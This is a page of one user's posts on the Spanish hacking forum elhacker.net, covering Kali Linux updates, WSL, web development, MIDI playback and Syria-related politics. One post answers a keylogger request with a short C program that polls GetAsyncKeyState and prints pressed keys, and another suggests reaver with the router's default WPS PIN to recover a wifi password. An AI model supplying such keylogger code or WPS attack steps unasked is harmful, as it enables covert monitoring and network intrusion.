elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 ... 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 [61] 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 ... 92
601  Sistemas Operativos / GNU/Linux / Re: Cuando intento actualizar kali linux me sale esto,Con el comando apt-get update en: 22 Abril 2018, 03:37 am
Y otro más... Esa solución la respondí hace un par de días cuando un usuario preguntó acerca de eso en el foro. Para colmo parece que nadie va a la página oficial a leer la documentación.  :¬¬

https://foro.elhacker.net/gnulinux/no_puedo_descargar_nada_en_mi_linux_kali-t482557.0.html;msg2159851#msg2159851


B#
602  Programación / Programación C/C++ / Re: ayuda para keylogger en: 19 Abril 2018, 01:46 am
Tendrías que aprender a programar primero antes de intentar hacer un keylogger, luego documentarte acerca de las APIs de Windows y recién ahí comenzar a armar tu programa deseado...

De todas formas te dejo la solución porque estaba aburrido... :silbar:

Código
  1. #include<windows.h>
  2. #include<cstdio>
  3.  
  4. int main(){
  5.    register int iTecla;
  6.    BOOL bRun=TRUE;
  7.    while(bRun){
  8.        for(iTecla^=iTecla;iTecla<256;iTecla++){
  9.            if(GetAsyncKeyState(iTecla)&1){
  10.                if(iTecla==VK_ESCAPE)
  11.                    bRun=FALSE;
  12.                printf("La tecla virtual numero %i fue presionada...\n",iTecla);}}
  13.        Sleep(17);}
  14.    return 0;}


B#
603  Seguridad Informática / Hacking / Re: Como hackear mi propio wifi?? en: 19 Abril 2018, 00:11 am
(...)Al modem nunca le desactivamos el wps desde que lo trajeron(...)

Fijate que en la etiqueta del modem/router debería venir el pin por defecto incluido en el router, con el programa reaver desde un entorno de gnu/linux al ingresar dicha clave te tendría que devolver la psk que te olvidaste...


B#
604  Programación / Desarrollo Web / Re: ¿Qué debo aprender para crear un foro? en: 18 Abril 2018, 04:38 am
Hola a todos! Quisiera saber que lenguajes tengo que saber además de HTML5,CSS3 y JavaScrip, es decir, tengo un poco de idea para realizar el front end, me faltarían conocimientos para hacer el back end.
 Hacepto todos los tips y recomendaciones que sean posibles, mientras más mejor.

Faltaría un lenguaje para manejo de base de datos como sql, de preferencia mariadb o mysql, como también su manejo seguro en cada petición para evitar que venga un cracker y te suba una shell rompa tu página, robe datos, etc...


B#
605  Sistemas Operativos / Windows / Re: Ubuntu en windows en: 17 Abril 2018, 06:09 am
Que bueno... yo no sabía que existían métodos para visualizar particiones de Linux en Windows... entonces debe ser mas fácil pasar directamente las carpetas desde el Ubuntu al Windows, porque desde allí están a la vista los discos de Windows... o no???...

Nononono el usuario @GonzaJava se refería a Ubuntu combinado con el WSL, windows no lee particiones ext4 pero si se le puede agregar la opción del WSL y luego con la Microsoft Store se instala una "mini distro" a elección...

De hecho la distro ni siquiera instala un kernel dado que el kernel que utiliza es el kernel Híbrido modificado por Microsoft para funcionar en su sistema basado en uno de Linux LTS o al menos eso parece:




B#
606  Sistemas Operativos / Windows / Re: Ubuntu en windows en: 17 Abril 2018, 03:53 am
Yo creo que allí la carretera es de un solo carril... o sea... puedes mover carpetas de Windows a Ubuntu, pero no al contrario...

Se puede de ambos lados debido a que el WSL monta los discos en la carpeta /mnt si mal no recuerdo... Dejenme unos minutos para comprobarlo y les aseguro bién

EDIT: Confirmado se montan los discos en /mnt



B#
607  Foros Generales / Foro Libre / Re: La guerra en siria se inicio creando al estado islamico por estados unidos en: 15 Abril 2018, 22:13 pm
y la mejor forma de enterarse que pasa en venezuela es por telesur... RT solo empezando es tan viciado y parcializado como cualquier medio famoso de eeuu, bastante lo vivi estando del otro lado de esa pantalla

¿¿¿Pero telesur no es una cadena a favor de Maduro??? ¿Si es así como es posible de enterarse lo que realmente pasa por Venezuela si hay alguién que te dibuja las noticias a antojo?

Me parece que ese video es un fake.

La guerra en siria es por:

Gasoducto
Petroleo
Rodear a rusia
Control de medio oriente
Rodear a iran

Cortar la ruta de la seda de china

Pero si explica en medio minuto "la razón principal que es el petroleo y otros recursos de porqué es una zona estratégica por razón económica para pasar por el mediterraneo", no entiendo como podés decir que el video es falso cuando sino le prestaste atención esa es la razón porque occidente desea Siria...


B#
608  Foros Generales / Foro Libre / Re: Fuerzas de ocupación Israelí lanzan gas tóxico contra manifestantes en: 14 Abril 2018, 23:01 pm
PD: Hago el post porqué sé que les gusta hablar de temas "escabrosos".  :P

No es que nos fascine hablar de temas "sabrosos" (ñamñamñam que rico estos temas :xD) compatriota, sinó que en estos días se estuvo debatiendo en el foro acerca de estos eventos que potencialmente pueden afectar de manera mundial a todo el mundo... Tanto si Rusia la ONU decidía y votaban positivamente realizar represalias (votación negativa) contra EEUU y sus aliados lo cuál desencadenaría la WW3 como sinó y todo sigue como ahora.

EDIT: Reemplazado Rusia con ONU


B#
609  Informática / Software / Re: MIDI en: 14 Abril 2018, 19:11 pm

Cuidado: Reproduce casi todo excepto formato midi y algunos otros... Para debian/ubuntu se necesita el paquete extra vlc-plugin-fluidsynth, para Windows habría que ver la documentación de como adaptarlo... Aclaro que eso lo probé hace un par de semanas con el mismo formato.


B#
610  Foros Generales / Foro Libre / Re: Decenas de muertos en otro ataque químico en Siria en: 14 Abril 2018, 06:41 am
Joder por lo que se ve en el vídeo le han dado fuerte por lo que se ve son objetivos en concretos.
(...)
Espero que no vamos a ver como reacciona Rusia ahora e Irán.

https://twitter.com/realDonaldTrump/status/984967457315139586

EDIT: youtube + subtítulos




B#
Páginas: 1 ... 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 [61] 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 ... 92
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines